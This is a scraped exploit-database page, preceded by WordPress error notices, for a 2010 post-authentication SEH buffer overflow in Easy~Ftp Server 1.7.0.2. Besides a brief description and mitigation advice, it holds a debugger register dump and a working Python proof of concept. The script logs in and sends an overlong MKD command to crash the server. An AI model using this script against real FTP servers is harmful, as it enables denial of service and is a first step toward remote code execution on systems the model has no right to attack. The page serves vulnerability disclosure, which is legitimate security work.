Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (SEH) (PoC) - exploit.company
header-logo
Suggest Exploit
vendor:
Easy~Ftp Server
by:
loneferret
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Easy~Ftp Server
Affected Version From: 1.7.0.2
Affected Version To: 1.7.0.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2/SP3 Professional
2010

Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (SEH) (PoC)

This exploit takes advantage of a buffer overflow vulnerability in Easy~Ftp Server v1.7.0.2. It specifically targets the MKD and DELE commands, using a payload that contains bad characters. By sending a specially crafted request, an attacker can cause a stack-based buffer overflow, potentially leading to remote code execution.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, it is recommended to restrict access to the affected application or use alternative software.
Source

Exploit-DB raw data:

#!/usr/bin/python

# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (SEH) (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date Found: 13/02/2010
# Developer contacted: 14/02/2010
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
# Tested on: Windows XP SP2/SP3 Professional
# Nod to the Exploit-DB Team

# Vulnerable commands: MKD / DELE
# badchars: \x00 \x0a \x2f \x5c

#SEH chain of thread 000001D8, item 0
# Address=0081FC60
# SE handler=41414141



#EAX 41414141
#ECX 0081FCCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
#EDX 005F3958
#EBX 00000000
#ESP 0081FB14
#EBP 00000000
#ESI 0081FCCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
#EDI 00000000
#EIP 0040BFDC ftpbasic.0040BFDC
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 0 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDD000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_INVALID_PARAMETER (00000057)
#EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
#ST0 empty %#.19L
#ST1 empty +UNORM 03E9 00000000 00000000
#ST2 empty 0.0
#ST3 empty 0.0
#ST4 empty -UNORM FAB4 00000000 00000002
#ST5 empty +UNORM 09B8 00000011 7C910732
#ST6 empty %#.19L
#ST7 empty -??? FFFF 7C910738 7C90EE18
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1


import socket


buffer = "\x41" * 505


s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('MKD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

Navigation

Suggest Exploit

Services By CQR

cqrsecured